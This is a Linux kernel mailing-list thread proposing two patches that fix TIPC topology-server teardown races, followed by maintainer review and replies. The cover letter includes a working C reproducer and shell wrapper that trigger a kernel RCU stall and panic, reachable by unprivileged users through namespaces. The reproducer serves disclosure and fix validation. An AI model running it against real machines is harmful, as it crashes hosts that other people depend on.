* [PATCH net 0/2] tipc: fix connection lifetime during netns teardown
@ 2026-09-18 9:21 Yuqi Xu
2026-09-18 9:21 ` [PATCH net 1/2] tipc: stop the listener before draining connections Yuqi Xu
` (2 more replies)
0 siblings, 3 replies; 6+ messages in thread
From: Yuqi Xu @ 2026-09-18 9:21 UTC (permalink / raw)
To: netdev
Cc: Jon Maloy, Tung Quang Nguyen, David S . Miller, Eric Dumazet,
Jakub Kicinski, Paolo Abeni, Simon Horman, Ying Xue,
Parthasarathy Bhuvaragan, Kuniyuki Iwashima, stable, Vega,
Ren Wei
Hi Linux kernel maintainers,
We found and validated an issue in net/tipc/topsrv.c. The bug is
reachable by an unprivileged user via user and network namespaces
(CLONE_NEWUSER|CLONE_NEWNET); the reproducer below also supports a
root mode.
We've tested it, and it should not affect any other functionality.
We will provide detailed information about the bug
in this email, along with a PoC to trigger it.
---- details below ----
Bug details:
`tipc_topsrv_stop()` can tear the topology server down in two unsafe
ways. It destroys `srv->rcv_wq`/`srv->send_wq` while the listener
socket still has its data-ready callback and `sk_user_data` installed,
so `tipc_topsrv_listener_data_ready()` can still queue `srv->awork` on
a freed workqueue. It also walks `conn_idr` by incrementing a numeric
ID while holding `idr_lock`, which can scan a large range of unused IDs
without letting a connection's final reference release make progress,
and it can resurrect an entry whose last reference was already dropped.
Reproducer:
#!/bin/sh
set -eu
SCRIPT_DIR="$(CDPATH= cd -- "$(dirname -- "$0")" && pwd)"
ITERATIONS="${1:-6000}"
THREADS="${2:-4}"
RUNTIME_USEC="${3:-20000}"
MODE="${MODE:-root}" # root | userns
STALL_TIMEOUT="${STALL_TIMEOUT:-20}"
CC_BIN="${CC:-gcc}"
cd "$SCRIPT_DIR"
"$CC_BIN" -O2 -Wall -pthread -o poc poc.c
if [ "${SET_PANIC_ON_RCU_STALL:-1}" = "1" ] && [ "$(id -u)" -eq 0 ]; then
sysctl -w kernel.panic_on_rcu_stall=1 >/dev/null 2>&1 || true
if [ -w /sys/module/rcupdate/parameters/rcu_cpu_stall_timeout ]; then
echo "$STALL_TIMEOUT" > /sys/module/rcupdate/parameters/rcu_cpu_stall_timeout
fi
fi
if [ "$MODE" = "userns" ]; then
CMD="./poc --userns -i $ITERATIONS -t $THREADS -r $RUNTIME_USEC"
else
CMD="./poc -i $ITERATIONS -t $THREADS -r $RUNTIME_USEC"
fi
echo "[*] running: $CMD"
exec sh -c "$CMD"
We run the PoC in a 2 vCPU, 2 GB RAM x86 QEMU environment.
------BEGIN poc.c------
#define _GNU_SOURCE
#include <errno.h>
#include <getopt.h>
#include <linux/tipc.h>
#include <pthread.h>
#include <sched.h>
#include <stdatomic.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
static atomic_int stop_flag;
struct run_cfg {
int iterations;
int threads;
int runtime_usec;
int ns_flags;
};
static void usage(const char *prog)
{
fprintf(stderr,
"Usage: %s [-i iterations] [-t threads] [-r runtime_usec] [--userns]\n"
" -i, --iterations number of fork/teardown cycles (default: 6000)\n"
" -t, --threads flood worker threads per cycle (default: 4)\n"
" -r, --runtime-us worker runtime per cycle in usec (default: 20000)\n"
" -U, --userns use CLONE_NEWUSER|CLONE_NEWNET (for non-root)\n",
prog);
}
static void parse_args(int argc, char **argv, struct run_cfg *cfg)
{
static const struct option long_opts[] = {
{ "iterations", required_argument, NULL, 'i' },
{ "threads", required_argument, NULL, 't' },
{ "runtime-us", required_argument, NULL, 'r' },
{ "userns", no_argument, NULL, 'U' },
{ "help", no_argument, NULL, 'h' },
{ 0, 0, 0, 0 },
};
int c;
cfg->iterations = 6000;
cfg->threads = 4;
cfg->runtime_usec = 20000;
cfg->ns_flags = CLONE_NEWNET;
while ((c = getopt_long(argc, argv, "i:t:r:Uh", long_opts, NULL)) != -1) {
switch (c) {
case 'i':
cfg->iterations = atoi(optarg);
break;
case 't':
cfg->threads = atoi(optarg);
break;
case 'r':
cfg->runtime_usec = atoi(optarg);
break;
case 'U':
cfg->ns_flags = CLONE_NEWUSER | CLONE_NEWNET;
break;
case 'h':
default:
usage(argv[0]);
exit(c == 'h' ? 0 : 1);
}
}
if (cfg->iterations <= 0 || cfg->threads <= 0 || cfg->runtime_usec < 0) {
usage(argv[0]);
exit(1);
}
}
static void *flood_worker(void *arg)
{
uintptr_t tid = (uintptr_t)arg;
struct sockaddr_tipc sa;
struct tipc_subscr sub;
memset(&sa, 0, sizeof(sa));
sa.family = AF_TIPC;
sa.addrtype = TIPC_SERVICE_ADDR;
sa.scope = TIPC_NODE_SCOPE;
sa.addr.name.name.type = TIPC_TOP_SRV;
sa.addr.name.name.instance = TIPC_TOP_SRV;
memset(&sub, 0, sizeof(sub));
sub.seq.type = 0x20000 + (uint32_t)tid;
sub.seq.lower = 1;
sub.seq.upper = 1;
sub.timeout = 0xffffffffu;
sub.filter = TIPC_SUB_SERVICE;
while (!atomic_load_explicit(&stop_flag, memory_order_relaxed)) {
int fd = socket(AF_TIPC, SOCK_SEQPACKET | SOCK_NONBLOCK, 0);
if (fd < 0)
continue;
(void)connect(fd, (struct sockaddr *)&sa, sizeof(sa));
(void)send(fd, &sub, sizeof(sub), MSG_DONTWAIT);
close(fd);
}
return NULL;
}
static void run_one_iteration(const struct run_cfg *cfg)
{
pthread_t *tids;
int i;
if (unshare(cfg->ns_flags) < 0)
_exit(111);
tids = calloc((size_t)cfg->threads, sizeof(*tids));
if (!tids)
_exit(1);
atomic_store_explicit(&stop_flag, 0, memory_order_relaxed);
for (i = 0; i < cfg->threads; i++)
pthread_create(&tids[i], NULL, flood_worker,
(void *)(uintptr_t)(i + 1));
usleep((useconds_t)cfg->runtime_usec);
_exit(0);
}
int main(int argc, char **argv)
{
struct run_cfg cfg;
int i;
int ns_failures = 0;
parse_args(argc, argv, &cfg);
for (i = 0; i < cfg.iterations; i++) {
pid_t pid = fork();
int st;
if (pid == 0)
run_one_iteration(&cfg);
if (pid < 0)
return 1;
if (waitpid(pid, &st, 0) < 0)
return 1;
if (WIFEXITED(st) && WEXITSTATUS(st) == 111)
ns_failures++;
if ((i % 200) == 0)
fprintf(stderr, "iter=%d ns_failures=%d\n", i, ns_failures);
}
if (ns_failures == cfg.iterations) {
fprintf(stderr,
"all iterations failed to create namespaces (EPERM likely)\n");
return 2;
}
return 0;
}
------END poc.c--------
----BEGIN crash log----
[ 292.540819][ C1] rcu: INFO: rcu_preempt self-detected stall on CPU
[ 292.647997][ C1] Workqueue: tipc_rcv tipc_topsrv_accept
[ 292.708934][ C0] Workqueue: netns cleanup_net
[ 292.709097][ C0] <TASK>
[ 292.709101][ C0] __radix_tree_lookup+0xb7/0x290
[ 292.709134][ C0] tipc_topsrv_exit_net+0x19c/0x4e0
[ 292.709169][ C0] ops_exit_list+0xc0/0x180
[ 292.709192][ C0] cleanup_net+0x5b9/0xbd0
[ 292.709217][ C0] process_one_work+0x981/0x1930
[ 292.709275][ C0] worker_thread+0x729/0x10e0
[ 292.709314][ C0] kthread+0x338/0x410
[ 292.709364][ C0] ret_from_fork_asm+0x11/0x20
[ 292.709383][ C0] </TASK>
[ 292.831321][ C1] Kernel panic - not syncing: RCU Stall
[ 292.834975][ C1] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996)
[ 292.839167][ C1] Call Trace:
[ 292.875653][ C1] asm_sysvec_apic_timer_interrupt+0x1a/0x20
[ 292.906505][ C1] tipc_topsrv_accept+0x104/0x300
[ 292.909515][ C1] process_one_work+0x981/0x1930
[ 292.919937][ C1] ret_from_fork+0x4b/0x80
[ 292.926345][ C1] Kernel Offset: disabled
[ 292.927571][ C1] Rebooting in 86400 seconds..
-----END crash log-----
Best regards,
Yuqi Xu
Yuqi Xu (2):
tipc: stop the listener before draining connections
tipc: make conn_idr teardown safe
net/tipc/topsrv.c | 27 ++++++++++++++++++++-------
1 file changed, 20 insertions(+), 7 deletions(-)
base-commit: 24ef02f934eeb48830cff6b739abc3c62b1d107b
--
2.55.0
^ permalink raw reply [flat|nested] 6+ messages in thread* [PATCH net 1/2] tipc: stop the listener before draining connections
2026-09-18 9:21 [PATCH net 0/2] tipc: fix connection lifetime during netns teardown Yuqi Xu
@ 2026-09-18 9:21 ` Yuqi Xu
2026-09-21 2:55 ` Tung Quang Nguyen
2026-09-18 9:21 ` [PATCH net 2/2] tipc: make conn_idr teardown safe Yuqi Xu
2026-09-20 7:34 ` [PATCH net 0/2] tipc: fix connection lifetime during netns teardown Yuqi Xu
2 siblings, 1 reply; 6+ messages in thread
From: Yuqi Xu @ 2026-09-18 9:21 UTC (permalink / raw)
To: netdev
Cc: Jon Maloy, Tung Quang Nguyen, David S . Miller, Eric Dumazet,
Jakub Kicinski, Paolo Abeni, Simon Horman, Ying Xue,
Parthasarathy Bhuvaragan, Kuniyuki Iwashima, stable, Vega,
Ren Wei
tipc_topsrv_stop() destroyed the receive workqueue while the listener
socket still had its data-ready callback and sk_user_data installed.
An incoming connection request could then queue srv->awork on the freed
workqueue from tipc_topsrv_listener_data_ready().
Reject new accepts, clear sk_user_data under sk_callback_lock and cancel
pending accept work before the workqueues are torn down.
Fixes: 0ef897be12b8 ("tipc: separate topology server listener socket from subcsriber sockets")
Cc: stable@vger.kernel.org
Reported-by: Vega <vega@nebusec.ai>
Assisted-by: LLM
Signed-off-by: Yuqi Xu <xuyuqiabc@gmail.com>
Reviewed-by: Ren Wei <enjou1224z@gmail.com>
---
net/tipc/topsrv.c | 10 +++++++++-
1 file changed, 9 insertions(+), 1 deletion(-)
diff --git a/net/tipc/topsrv.c b/net/tipc/topsrv.c
index af530c9ed840..908622a3d0fc 100644
--- a/net/tipc/topsrv.c
+++ b/net/tipc/topsrv.c
@@ -700,6 +700,15 @@ static void tipc_topsrv_stop(struct net *net)
struct tipc_conn *con;
int id;
+ spin_lock_bh(&srv->idr_lock);
+ srv->listener = NULL;
+ spin_unlock_bh(&srv->idr_lock);
+
+ write_lock_bh(&lsock->sk->sk_callback_lock);
+ lsock->sk->sk_user_data = NULL;
+ write_unlock_bh(&lsock->sk->sk_callback_lock);
+ cancel_work_sync(&srv->awork);
+
spin_lock_bh(&srv->idr_lock);
for (id = 0; srv->idr_in_use; id++) {
con = idr_find(&srv->conn_idr, id);
@@ -713,7 +722,6 @@ static void tipc_topsrv_stop(struct net *net)
}
__module_get(lsock->ops->owner);
__module_get(lsock->sk->sk_prot_creator->owner);
- srv->listener = NULL;
spin_unlock_bh(&srv->idr_lock);
tipc_topsrv_work_stop(srv);
--
2.55.0
^ permalink raw reply related [flat|nested] 6+ messages in thread* RE: [PATCH net 1/2] tipc: stop the listener before draining connections
2026-09-18 9:21 ` [PATCH net 1/2] tipc: stop the listener before draining connections Yuqi Xu
@ 2026-09-21 2:55 ` Tung Quang Nguyen
0 siblings, 0 replies; 6+ messages in thread
From: Tung Quang Nguyen @ 2026-09-21 2:55 UTC (permalink / raw)
To: Yuqi Xu
Cc: Jon Maloy, David S . Miller, Eric Dumazet, netdev@vger.kernel.org,
Jakub Kicinski, Paolo Abeni, Simon Horman, Kuniyuki Iwashima,
stable@vger.kernel.org, Vega, Ren Wei
>Subject: [PATCH net 1/2] tipc: stop the listener before draining connections
>
>tipc_topsrv_stop() destroyed the receive workqueue while the listener socket
>still had its data-ready callback and sk_user_data installed.
>An incoming connection request could then queue srv->awork on the freed
>workqueue from tipc_topsrv_listener_data_ready().
It is not clear what kernel stack trace is observed when the issue hits after reading the cover letter.
Can you add the stack trace and command (./proc with concrete arguments) to trigger this issue to the changelog ?
^ permalink raw reply [flat|nested] 6+ messages in thread
* [PATCH net 2/2] tipc: make conn_idr teardown safe
2026-09-18 9:21 [PATCH net 0/2] tipc: fix connection lifetime during netns teardown Yuqi Xu
2026-09-18 9:21 ` [PATCH net 1/2] tipc: stop the listener before draining connections Yuqi Xu
@ 2026-09-18 9:21 ` Yuqi Xu
2026-09-21 3:01 ` Tung Quang Nguyen
2026-09-20 7:34 ` [PATCH net 0/2] tipc: fix connection lifetime during netns teardown Yuqi Xu
2 siblings, 1 reply; 6+ messages in thread
From: Yuqi Xu @ 2026-09-18 9:21 UTC (permalink / raw)
To: netdev
Cc: Jon Maloy, Tung Quang Nguyen, David S . Miller, Eric Dumazet,
Jakub Kicinski, Paolo Abeni, Simon Horman, Ying Xue,
Parthasarathy Bhuvaragan, Kuniyuki Iwashima, stable, Vega,
Ren Wei
The teardown walk iterated conn_idr by incrementing a numeric ID while
holding idr_lock, so it could scan a large range of unused IDs without
letting a connection's final reference release make progress. An entry
whose last reference had already been dropped could also be resurrected
by the unconditional conn_get() while its release callback was blocked
on the same lock.
Walk conn_idr with idr_get_next(), release the lock and reschedule when
no entry can be taken, and use kref_get_unless_zero() so a connection
that is already being released cannot be revived.
Fixes: 35e22e49a5d6 ("tipc: fix cleanup at module unload")
Fixes: 667eeab4999e ("tipc: Fix use-after-free in tipc_conn_close().")
Cc: stable@vger.kernel.org
Reported-by: Vega <vega@nebusec.ai>
Assisted-by: LLM
Signed-off-by: Yuqi Xu <xuyuqiabc@gmail.com>
Reviewed-by: Ren Wei <enjou1224z@gmail.com>
---
net/tipc/topsrv.c | 17 +++++++++++------
1 file changed, 11 insertions(+), 6 deletions(-)
diff --git a/net/tipc/topsrv.c b/net/tipc/topsrv.c
index 908622a3d0fc..9333e36a74de 100644
--- a/net/tipc/topsrv.c
+++ b/net/tipc/topsrv.c
@@ -710,15 +710,20 @@ static void tipc_topsrv_stop(struct net *net)
cancel_work_sync(&srv->awork);
spin_lock_bh(&srv->idr_lock);
- for (id = 0; srv->idr_in_use; id++) {
- con = idr_find(&srv->conn_idr, id);
- if (con) {
- conn_get(con);
+ for (id = 0; srv->idr_in_use;) {
+ con = idr_get_next(&srv->conn_idr, &id);
+ if (!con || !kref_get_unless_zero(&con->kref)) {
spin_unlock_bh(&srv->idr_lock);
- tipc_conn_close(con);
- conn_put(con);
+ cond_resched();
spin_lock_bh(&srv->idr_lock);
+ id = 0;
+ continue;
}
+ id++;
+ spin_unlock_bh(&srv->idr_lock);
+ tipc_conn_close(con);
+ conn_put(con);
+ spin_lock_bh(&srv->idr_lock);
}
__module_get(lsock->ops->owner);
__module_get(lsock->sk->sk_prot_creator->owner);
--
2.55.0
^ permalink raw reply related [flat|nested] 6+ messages in thread* RE: [PATCH net 2/2] tipc: make conn_idr teardown safe
2026-09-18 9:21 ` [PATCH net 2/2] tipc: make conn_idr teardown safe Yuqi Xu
@ 2026-09-21 3:01 ` Tung Quang Nguyen
0 siblings, 0 replies; 6+ messages in thread
From: Tung Quang Nguyen @ 2026-09-21 3:01 UTC (permalink / raw)
To: Yuqi Xu
Cc: Jon Maloy, David S . Miller, Eric Dumazet, Jakub Kicinski,
Paolo Abeni, Simon Horman, Kuniyuki Iwashima,
stable@vger.kernel.org, Vega, netdev@vger.kernel.org, Ren Wei
>Subject: [PATCH net 2/2] tipc: make conn_idr teardown safe
>
>The teardown walk iterated conn_idr by incrementing a numeric ID while
>holding idr_lock, so it could scan a large range of unused IDs without letting a
>connection's final reference release make progress. An entry whose last
>reference had already been dropped could also be resurrected by the
>unconditional conn_get() while its release callback was blocked on the same
>lock.
>
It is not clear what kernel stack trace is observed when the issue hits after reading the cover letter.
Can you add the stack trace and command (./proc with concrete arguments) to trigger this issue to the changelog ?
Note that I tried to run the reproducer (root mode) but the stack trace was different from the one mentioned in the cover letter.
^ permalink raw reply [flat|nested] 6+ messages in thread
* Re: [PATCH net 0/2] tipc: fix connection lifetime during netns teardown
2026-09-18 9:21 [PATCH net 0/2] tipc: fix connection lifetime during netns teardown Yuqi Xu
2026-09-18 9:21 ` [PATCH net 1/2] tipc: stop the listener before draining connections Yuqi Xu
2026-09-18 9:21 ` [PATCH net 2/2] tipc: make conn_idr teardown safe Yuqi Xu
@ 2026-09-20 7:34 ` Yuqi Xu
2 siblings, 0 replies; 6+ messages in thread
From: Yuqi Xu @ 2026-09-20 7:34 UTC (permalink / raw)
To: netdev
Cc: Jon Maloy, Tung Quang Nguyen, David S. Miller, Eric Dumazet,
Jakub Kicinski, Paolo Abeni, Simon Horman, Ying Xue,
Parthasarathy Bhuvaragan, Kuniyuki Iwashima, stable, Vega,
Ren Wei, xuyq21
Hi all,
Thanks for the review. We verified each point against the tree with
1/2 and 2/2 applied (net/tipc/topsrv.c line numbers below are from
that tree).
=== sashiko: [patch 1/2] infinite spin / softlockup ===
> Infinite spin loop and softlockup in tipc_topsrv_stop() when waiting
> for connections with pending work items to close: loop
> `for (id = 0; srv->idr_in_use; id++) { con = idr_find(...) ... }`
> holds `spin_lock_bh(&srv->idr_lock)`; when `con == NULL` the lock is
> not dropped before continuing -> spins ~2^32 times.
> locations: net/tipc/topsrv.c:713 tipc_topsrv_stop;
> net/tipc/topsrv.c:133 tipc_conn_kref_release.
Correct, and this is precisely the failure this series fixes. In the
pre-patch code the walk is:
for (id = 0; srv->idr_in_use; id++) {
con = idr_find(&srv->conn_idr, id);
if (con) {
conn_get(con);
spin_unlock_bh(&srv->idr_lock);
tipc_conn_close(con);
conn_put(con);
spin_lock_bh(&srv->idr_lock);
}
}
When `idr_find()` returns NULL the loop keeps incrementing `id` while
still holding `idr_lock`. Any connection whose last reference is being
dropped in tipc_conn_kref_release() then blocks forever on
spin_lock_bh(&s->idr_lock), so `srv->idr_in_use` never reaches zero
and the CPU spins under the lock. That is the
`__radix_tree_lookup -> tipc_topsrv_exit_net` RCU stall in the crash
log of the cover letter.
2/2 rewrites exactly this walk:
for (id = 0; srv->idr_in_use;) {
con = idr_get_next(&srv->conn_idr, &id);
if (!con || !kref_get_unless_zero(&con->kref)) {
spin_unlock_bh(&srv->idr_lock);
cond_resched();
spin_lock_bh(&srv->idr_lock);
id = 0;
continue;
}
id++;
spin_unlock_bh(&srv->idr_lock);
tipc_conn_close(con);
conn_put(con);
spin_lock_bh(&srv->idr_lock);
}
i.e. it uses idr_get_next() and, whenever no entry can be taken, drops
idr_lock, reschedules and retries, so a pending
tipc_conn_kref_release() can always make progress and the loop cannot
spin under the lock. So the finding is correct for 1/2 standing alone
but is fully addressed by 2/2; no further change is needed for this
point.
=== sashiko: [patch 2/2] sock_release() in atomic context ===
> `sock_release()` called in atomic/softirq context:
> `tipc_sub_timeout()` (timer softirq) -> `tipc_topsrv_queue_evt()`
> -> `conn_put()` -> `tipc_conn_kref_release()` -> `sock_release()`
> sleeps (`lock_sock()`), sleep-in-atomic.
> locations: net/tipc/subscr.c:110, net/tipc/topsrv.c:322,
> net/tipc/topsrv.c:120.
The chain is not quite as drawn. tipc_conn_kref_release() does not
call sock_release() unconditionally: it already has `if (con->sock)`
(line 134), so in-kernel connections never take that path.
For socket-backed connections the remaining sleep-in-atomic concern
is real but narrower than the chain suggests, and this series does
not change it:
- tipc_topsrv_queue_evt() only calls conn_put() synchronously on its
error path (line 340): the connection is no longer connected after
the lookup, kmalloc fails, or queue_work() returns false because
->swork is already queued. On the normal path the lookup reference
is handed to tipc_conn_send_work(), which runs in process context
and does the final conn_put() there.
- So the remaining sock_release() in timer softirq only happens when
that specific conn_put() drops the last reference of a socket-backed
connection, i.e. when the connection is being torn down concurrently.
- Neither 1/2 nor 2/2 touch subscr.c, tipc_topsrv_queue_evt() or
tipc_conn_kref_release(). 1/2 only detaches the listener and cancels
srv->awork; it does not touch the subscription timer path.
So this is pre-existing and orthogonal to the two patches, not for
this series. A separate follow-up could avoid dropping the last
reference for a socket-backed connection from softirq; that would be
a separate patch.
=== sashiko: [patch 2/2] NULL deref in tipc_conn_close() ===
> Unconditional `con->sock->sk` deref in `tipc_conn_close()` panics for
> in-kernel subscriptions (`tipc_topsrv_kern_subscr()` passes NULL sock
> -> `con->sock == NULL`); `tipc_conn_kref_release()` checks
> `if (con->sock)` but `tipc_conn_close()` does not.
> locations: net/tipc/topsrv.c:158 tipc_conn_close,
> net/tipc/topsrv.c:724 tipc_topsrv_stop.
This one is a valid latent bug, and we agree with the asymmetry:
tipc_conn_close() does `struct sock *sk = con->sock->sk;` (line 158)
unconditionally, while tipc_conn_kref_release() guards its
sock_release() with `if (con->sock)` (line 134).
tipc_topsrv_kern_subscr() really does allocate with sock == NULL
(line 587) and such a connection is inserted into conn_idr, so if one
is still there when tipc_topsrv_stop() walks the idr, 2/2's loop calls
tipc_conn_close() on a connection whose con->sock is NULL.
About reachability in the netns teardown path: the in-kernel
subscriber is created from tipc_group_create() (net/tipc/group.c:190),
and it is normally removed synchronously by tipc_group_delete() ->
tipc_topsrv_kern_unsubscr() when the owning socket is released
(tipc_release() -> tipc_sk_leave()). Since the socket holds a net
reference, netns teardown cannot overtake that. The NULL deref
therefore needs a kernel connection that is still in conn_idr at stop
time, e.g. when tipc_topsrv_kern_unsubscr()'s two conn_put() calls do
not drop the last reference because a pending con->swork still holds
one. That is a narrow race, not the common path.
It is also pre-existing: the pre-patch loop already called
tipc_conn_close() on every entry found in conn_idr, including
sock == NULL kernel connections, so 1/2 + 2/2 do not introduce it.
(kref_get_unless_zero() in 2/2 only narrows the
already-dropped-reference window; it does not dereference con->sock.)
Orthogonal to this series. A separate follow-up could mirror
tipc_conn_kref_release()'s check in tipc_conn_close(), i.e. skip the
con->sock->sk access when con->sock == NULL; that would be a
separate patch.
Best regards,
Yuqi Xu
^ permalink raw reply [flat|nested] 6+ messages in thread
end of thread, other threads:[~2026-09-21 3:01 UTC | newest]
Thread overview: 6+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-09-18 9:21 [PATCH net 0/2] tipc: fix connection lifetime during netns teardown Yuqi Xu
2026-09-18 9:21 ` [PATCH net 1/2] tipc: stop the listener before draining connections Yuqi Xu
2026-09-21 2:55 ` Tung Quang Nguyen
2026-09-18 9:21 ` [PATCH net 2/2] tipc: make conn_idr teardown safe Yuqi Xu
2026-09-21 3:01 ` Tung Quang Nguyen
2026-09-20 7:34 ` [PATCH net 0/2] tipc: fix connection lifetime during netns teardown Yuqi Xu
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox